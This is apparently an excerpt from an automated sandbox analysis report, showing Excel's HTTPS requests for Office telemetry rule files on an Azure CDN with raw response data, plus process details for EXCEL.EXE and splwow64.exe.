x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:56:04 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 31 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 41 54 53 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 41 54 53 22
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703101" V="1" DC="SM" EN="Office.Telemetry.Event.Office.MATS.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMATS"


Session IDSource IPSource PortDestination IPDestination Port
147192.168.2.55265513.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:56:04 UTC192OUTGET /rules/rule703100v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:56:05 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:56:04 GMT
Content-Type: text/xml
Content-Length: 1356
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:04 GMT
ETag: "0x8DC582BEBCD5699"
x-ms-request-id: e7bc05d9-601e-0050-5186-292c9c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025604Z-17c5cb586f6wmhkn5q6fu8c5ss00000006y000000000187p
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:56:05 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 31 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 41 54 53 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 41 54 53 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703100" V="1" DC="SM" EN="Office.Telemetry.Event.Office.MATS" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMATS" S="Medium" /> <F T="2">


Session IDSource IPSource PortDestination IPDestination Port
148192.168.2.55265613.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:56:04 UTC192OUTGET /rules/rule702901v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:56:05 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:56:04 GMT
Content-Type: text/xml
Content-Length: 1411
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
ETag: "0x8DC582BE53FACDA"
x-ms-request-id: 6dd908e6-f01e-0003-6057-274453000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025604Z-16849878b78fkwcjkpn19c5dsn00000006h0000000002qa1
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:56:05 UTC1411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 61 6e 61 67 65 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702901" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Manageability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantT


Session IDSource IPSource PortDestination IPDestination Port
149192.168.2.55265713.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:56:05 UTC192OUTGET /rules/rule702900v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:56:05 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:56:05 GMT
Content-Type: text/xml
Content-Length: 1374
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
ETag: "0x8DC582BE539933F"
x-ms-request-id: 808f8029-401e-0048-026a-270409000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025605Z-15b8d89586f8nxpt6ys645x5v000000008m000000000e5qp
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:56:05 UTC1374INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 61 6e 61 67 65 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 61 6e 61 67 65 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702900" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Manageability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenManageability" S="Medium" />


Click to jump to process

Click to jump to process

Click to dive into process behavior distribution

Click to jump to process

Target ID:0
Start time:22:55:18
Start date:29/10/2024
Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Imagebase:0xd30000
File size:53'161'064 bytes
MD5 hash:4A871771235598812032C822E6F68F19
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:6
Start time:22:56:21
Start date:29/10/2024
Path:C:\Windows\splwow64.exe
Wow64 process (32bit):false
Commandline:C:\Windows\splwow64.exe 12288
Imagebase:0x7ff7b3aa0000
File size:163'840 bytes
MD5 hash:77DE7761B037061C7C112FD3C5B91E73
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

No disassembly